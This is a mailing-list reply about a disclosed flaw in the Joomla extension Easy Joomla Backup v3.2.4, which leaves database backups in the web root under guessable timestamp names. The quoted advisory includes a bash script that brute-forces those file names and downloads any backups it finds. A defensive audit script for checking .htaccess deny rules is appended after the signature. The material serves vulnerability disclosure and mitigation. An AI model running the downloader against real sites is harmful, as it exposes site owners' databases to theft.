Date: Thu, 28 Sep 2017 15:09:11 +0200
From: David Jardin <david.jardin@...munity.joomla.org>
To: oss-security@...ts.openwall.com
Subject: Re: Joomla extension Easy Joomla Backup v3.2.4 database backup exposure

It’s worth mentioning that the extension has a default .htaccess file with a "deny from all" in the backup directory, which will mitigate the described attack on pretty much any standard shared-hosting platform that I’m aware of.

On 28 September 2017 at 14:37:20, Larry W. Cashdollar (larry0@...com) wrote:

Title: Joomla extension Easy Joomla Backup v3.2.4 database backup exposure
Author: Larry W. Cashdollar, @_larry0
Date: 2017-09-07
CVE-ID: [CVE-2017-2550]
Download Site: https://joomla-extensions.kubik-rubik.de/ejb-easy-joomla-backup
Vendor: kubik-rubik
Vendor Notified: 2017-09-07
Vendor Contact:
Advisory: http://www.vapidlabs.com/advisory.php?v=200
Description: Easy Joomla Backup creates 'old-school' backups without any frills.
Vulnerability:
The software creates a copy of the backup in the web root. The file name is easily guessable as it's just a time stamp:

http://example.com/administrator/components/com_easyjoomlabackup/backups/DOMAIN_YEAR-MONTH-DAY_H-M-S.zip

Exploit Code:
#!/bin/bash
#Larry W. Cashdollar, @_larry0 9/7/2017
#Bruteforce download backups for Joomla Extension Easy Joomla Backup v3.2.4
#https://joomla-extensions.kubik-rubik.de/ejb-easy-joomla-backup
MONTH=09
DAY=07
YEAR=2017
Z=0
#May need to set the DOMAIN to $1 the target depending on how Joomla is configured.
DOMAIN=192.168.0.163

echo "Scanning website for available backups:"
for y in `seq -w 0 23`; do
  for x in `seq -w 0 59`; do
    # progress as a percentage of the 86400 second-resolution names in one day
    Y=`echo "scale=2;($Z/86400)*100"|bc`;
    echo -ne "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b$CPATH $Y%"
    for z in `seq -w 0 59`; do
      Z=$(( $Z + 1 ));
      CPATH="http://$1/administrator/components/com_easyjoomlabackup/backups/"$DOMAIN"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip";
      RESULT=`curl -s --head "$CPATH"|grep 200`;
      if [ -n "$RESULT" ]; then
        echo ""
        echo "[+] Location $CPATH Found";
        echo "[+] Received $RESULT";
        echo "Downloading......";
        wget "$CPATH"
      fi;
    done
  done
done
echo "Completed."
-- 
Kind Regards,
David Jardin
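The mitigation David describes (a per-directory .htaccess deny rule in front of timestamp-named archives) is something a site owner can verify locally. The script below is an added example written for this thread; it is not code from the advisory or from the Easy Joomla Backup extension. It takes a hypothetical backup directory path as its argument, looks for archives following the DOMAIN_YYYY-MM-DD_HH-MM-SS.zip scheme from the advisory, and checks whether the directory's .htaccess carries an Apache 2.2 "deny from all" or Apache 2.4 "Require all denied" directive.

```shell
#!/bin/bash
# Added example, not code from the advisory or from the Easy Joomla Backup extension.
# Audits a local backup directory: are there archives with the guessable
# DOMAIN_YYYY-MM-DD_HH-MM-SS.zip name, and does an .htaccess deny rule cover them?
# The directory path is a hypothetical argument; Apache .htaccess semantics are assumed.

# Returns 0 if "$1/.htaccess" contains an Apache 2.2 "deny from all" or an
# Apache 2.4 "Require all denied" directive on a line of its own, 1 otherwise.
htaccess_denies_all() {
    f="$1/.htaccess"
    [ -f "$f" ] || return 1
    grep -Eiq '^[[:space:]]*(deny[[:space:]]+from[[:space:]]+all|require[[:space:]]+all[[:space:]]+denied)[[:space:]]*$' "$f"
}

# Prints every archive directly inside "$1" whose name follows the timestamp scheme.
list_guessable_backups() {
    find "$1" -maxdepth 1 -type f \
        -name '*_[0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9]_[0-9][0-9]-[0-9][0-9]-[0-9][0-9].zip' \
        2>/dev/null
}

# Number of guessable archives in "$1" (0 when the directory is missing or empty).
count_guessable_backups() {
    list_guessable_backups "$1" | wc -l | tr -d ' '
}

# Verdict for one directory: exit 0 = not exposed (nothing to guess, or access denied),
# exit 1 = exposed (guessable archives present and no deny rule in .htaccess).
audit_backup_dir() {
    if [ "$(count_guessable_backups "$1")" -eq 0 ]; then
        return 0
    fi
    htaccess_denies_all "$1"
}

# Stand-alone use:
#   ./audit_backups.sh /path/to/administrator/components/com_easyjoomlabackup/backups
if [ "$#" -eq 1 ]; then
    if audit_backup_dir "$1"; then
        echo "OK: $1 has no guessable archive reachable without a deny rule"
    else
        echo "EXPOSED: $(count_guessable_backups "$1") guessable archive(s) and no deny rule in $1/.htaccess"
        exit 1
    fi
fi
```

The file check only means something where the web server actually honours per-directory overrides: Apache needs AllowOverride enabled for that path, and nginx or IIS ignore .htaccess files entirely, so on those platforms the directory has to be blocked in the server configuration instead. Either way, confirm from outside that the backup directory and a known archive name return 403 or 404 rather than relying on the presence of the file alone.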